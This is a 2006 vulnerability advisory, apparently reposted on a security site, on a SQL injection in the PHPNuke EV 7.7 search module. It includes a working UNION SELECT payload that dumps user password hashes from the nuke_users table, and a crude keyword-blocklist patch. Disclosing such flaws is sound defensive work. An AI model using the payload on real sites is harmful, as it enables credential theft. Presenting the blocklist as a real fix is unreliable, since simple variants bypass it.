PHPNuke EV 7.7 search module query variable SQL injection
Source: http://lostmon.blogspot.com/ Author: Lostmon Published: 2006-01-10

###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available: yes   vendor notified: yes
advisory: http://lostmon.blogspot.com/2006/01/phpnuke-ev-77-search-module-query.html
################################################

PHPNuke EV 7.7 has a flaw which can be exploited by malicious
people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1

Prior versions may also be affected.

##################
solution:
###################

No solution at this time!!!

A possible fix:

Open the file modules/Search/index.php and, after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

add the following:

------------------------------------

// $query is the raw search string (PHP-Nuke reads it straight from the
// request); abort the page if it carries a UNION SELECT, either as plain
// text or with the space still URL-encoded as %20.
// Note: eregi() was removed in PHP 7; preg_match() with the /i flag is the
// modern equivalent of this case-insensitive match.
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
This is a "simple fix": it only detects the UNION SELECT command and calls
die() if it appears in the query variable. You can write the same code for
UNION ALL SELECT or other variants of the exploit.

####################
Timeline
####################

discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006

###################
example:
###################

Go to

http://[Victim]/modules.php?name=Search

and enter this proof of concept in the search box:

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

All user password hashes are then visible.

#################### €nd ########################

Thanks to estrella for being my light


--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved